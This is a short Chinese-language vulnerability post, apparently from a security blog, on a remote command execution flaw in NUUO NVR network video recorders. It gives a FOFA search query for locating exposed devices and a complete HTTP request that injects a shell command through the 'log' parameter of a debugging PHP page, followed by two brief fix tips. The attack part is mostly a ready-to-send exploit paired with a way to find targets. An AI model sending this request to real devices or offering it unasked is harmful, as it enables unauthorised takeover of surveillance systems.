免责声明：本号提供的网络安全信息仅供参考，不构成专业建议。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权，请及时与我联系，我将尽快处理并删除相关内容。

漏洞描述

NUUO NVR是中国台湾省NUUO公司旗下的一款网络视频记录器，该设备存在远程命令执行漏洞，攻击者可利用该漏洞执行任意命令，进而获取服务器的权限。

搜索语法 

FOFA：title="Network Video Recorder Login "

漏洞再现

GET /__debugging_center_utils___.php?log=;id HTTP/1.1

Host: 

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

修复建议

1、禁⽌公⽹访问该系统。
2、及时升级产品到最新版本。